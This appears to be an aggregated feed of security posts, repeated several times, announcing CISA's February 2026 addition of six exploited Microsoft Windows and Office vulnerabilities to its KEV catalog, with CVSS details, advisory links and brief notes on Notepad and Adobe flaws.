- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21519
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🔐 CVE-2026-21519
CVE-2026-21519
Access of resource using incompatible type ('type confusion') in Desktop Window Manager allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21519
🛡️ CWE: CWE-843
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21519
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21519
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21519
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:51:48.077000
9 posts
🔐 CVE-2026-21525
CVE-2026-21525
Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.
📊 CVSS Score: 6.2
⚠️ Severity: Medium
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21525
🛡️ CWE: CWE-476
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21525
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21525
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🔐 CVE-2026-21525
CVE-2026-21525
Null pointer dereference in Windows Remote Access Connection Manager allows an unauthorized attacker to deny service locally.
📊 CVSS Score: 6.2
⚠️ Severity: Medium
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21525
🛡️ CWE: CWE-476
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21525
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21525
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21525
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:51:48.077000
9 posts
🔐 CVE-2026-21533
CVE-2026-21533
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21533
🛡️ CWE: CWE-269
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21533
🚨 [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
⚠️ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
⚠️ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
⚠️ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
⚠️ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
⚠️ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
⚠️ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21533
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##🔐 CVE-2026-21533
CVE-2026-21533
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
📊 CVSS Score: 7.8
⚠️ Severity: High
🚨 Exploited: true
📅 Published: 10.02.2026, 18:16
🏷️ Aliases: CVE-2026-21533
🛡️ CWE: CWE-269
🔗 CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
📚 References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21533
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21533
‼️ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:51:48.077000
4 posts
From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##A vulnerability in Notepad 🤦♂️
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
From the WTF department, sorry, I mean from Microsoft: an RCE in Notepad of all things. (Well, the new app with AI and stuff; not the old one.)
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
##A vulnerability in Notepad 🤦♂️
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-21347 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21347/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21347 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21347/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-21346 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21346/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21346 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21346/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
🟠 CVE-2026-21345 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
🔗 https://www.thehackerwire.com/vulnerability/CVE-2026-21345/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##🟠 CVE-2026-21345 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
